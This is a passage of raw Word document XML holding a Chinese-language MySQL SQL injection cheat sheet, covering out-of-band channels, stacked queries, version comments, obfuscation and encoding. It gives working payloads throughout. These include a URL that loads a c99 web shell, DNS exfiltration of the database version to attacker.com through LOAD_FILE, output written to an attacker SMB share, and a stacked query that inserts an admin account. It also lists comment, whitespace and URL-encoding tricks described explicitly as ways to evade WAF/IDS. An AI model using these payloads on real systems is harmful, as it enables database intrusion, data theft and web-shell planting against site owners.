          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://localhost/get.php?f=shell.php&amp;u=http://localhost/c99.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>注：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不能用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> INTO OUTFILE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">INTO OUTFILE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须是查询中的最后一条语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法对路径名进行编码，因此需要引号。</w:t>
      </w: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52" w:name="_Toc13563_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十七．带外信道</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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53" w:name="_Toc10451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DNS请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/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</w:pPr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SELECT LOAD_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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FILE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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CONCAT('\\\\foo.',(select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier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MID(version(),1,1)),'.attacker.com\\'));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/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</w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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54" w:name="_Toc538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SMB请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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' OR</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> 1=1 INTO OUTFILE '\\\\attacker\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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SMBshare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>\\output.txt</w:t>
      </w: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55" w:name="_Toc27879_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十八．堆叠查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55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MySQL的堆叠查询是可能的，这取决于PHP应用程序正在使用哪个驱动程序与数据库通信。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这个 PDO_MYSQL驱动程序支持堆叠查询。这个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MySQLi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 xml:space="preserve">（改进的扩展）驱动程序还支持通过 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multi_query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()功能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28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* FROM Users WHERE ID=1 AND 1=0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;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 xml:space="preserve">INSERT INTO Users(username, password, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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priv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) VALUES ('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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BobbyTables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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', 'kl20da$$','admin');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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* FROM Users WHERE ID=1 AND 1=0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;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SHOW COLUMNS FROM Users;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56" w:name="_Toc29976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/*</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr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堆叠查询为攻击者提供了大量的控制。通过终止原始查询并添加新查询，可以修改数据并调用存储过程,SQL中，分号表示已到达语句的末尾，后面的是一个新的语句。这允许在与数据库服务器相同的调用中执行多个语句。与限制选择语句的联合攻击相反，堆叠查询可用于执行任何SQL语句或过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109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57" w:name="_Toc30101_WPSOffice_Level1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*/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57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58" w:name="_Toc28193_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>十九．</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专用代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58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MySQL允许您在感叹号之后指定版本号。只有当版本大于或等于指定的版本号时，才会执行注释中的语法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29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UNION SELECT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/*!50000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5,null;%00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*//*!40000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4,null-- ,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*//*!30000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3,null-- x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*/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0,null--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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1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/*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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!41320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UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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/*!/*!/*!00000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/*!/*!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USER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/*!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(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/*!/*!/*!*/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);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59" w:name="_Toc7275_WPSOffice_Level2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第一个示例返回版本；它使用带有2列的UNION。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59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bookmarkStart w:id="60" w:name="_Toc8054_WPSOffice_Level2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第二个示例演示了这对于绕过WAF/IDS是如何有用的。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/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61" w:name="_Toc1769_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二十</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模糊混淆</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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62" w:name="_Toc4878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允许中间字符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62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下面的字符可以用作空白字符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2068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260"/>
      </w:tblGrid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09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水平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制表符</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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0A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换行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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0B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垂直制表符</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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0C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新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建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页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面</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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0D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回车</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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A0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空格</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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hAnsi="Courier" w:cs="Courier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6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空间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31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'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%0A%09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UNION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%0C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%A0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NULL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%20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%23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括号也可以用来避免使用空格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572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205"/>
      </w:tblGrid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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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(</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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</w:tbl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lastRenderedPageBreak/>
        <w:t>例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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UNION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(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(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column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FROM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(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table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))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30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63" w:name="_Toc10762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允许在AND/OR之后的中间字符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/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947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580"/>
      </w:tblGrid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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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Space</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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2B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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2D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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7E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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~</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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@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widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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SELECT 1 FROM dual WHERE 1=1 AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-+-+-+-+~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>((1))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dual 是一个可用于测试的虚拟表。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30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64" w:name="_Toc6138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用注释混淆</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64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注释可用于分解查询以欺骗WAF/IDS并避免检测。通过使用#或-后面跟着换行符，我们可以将查询分割成不同的行。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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/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</w:pP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1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#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br/>
        <w:t>AND 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--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br/>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># I am a comment!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br/>
      </w:r>
      <w:proofErr w:type="spellStart"/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SELECT@tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> x FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--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 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br/>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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information_schema`.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> LIMIT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对注入进行编码的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%23%0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AND 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--%0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%23 I am a comment</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>!%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT@tmp:=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> x FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--%0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>`information_schema`.tables LIMIT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>某些函数也可以用注释和空白来混淆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/**/%A0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/*comment*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)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30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65" w:name="_Toc23793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lastRenderedPageBreak/>
        <w:t>编码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65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对注入进行编码有时对WAF/IDS规避很有用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8294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224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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 xml:space="preserve">URL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编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6224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SELECT %74able_%6eame FROM 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</w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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双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 xml:space="preserve"> URL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编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6224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SELECT %2574able_%256eame FROM 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</w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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 xml:space="preserve">Unicode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编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
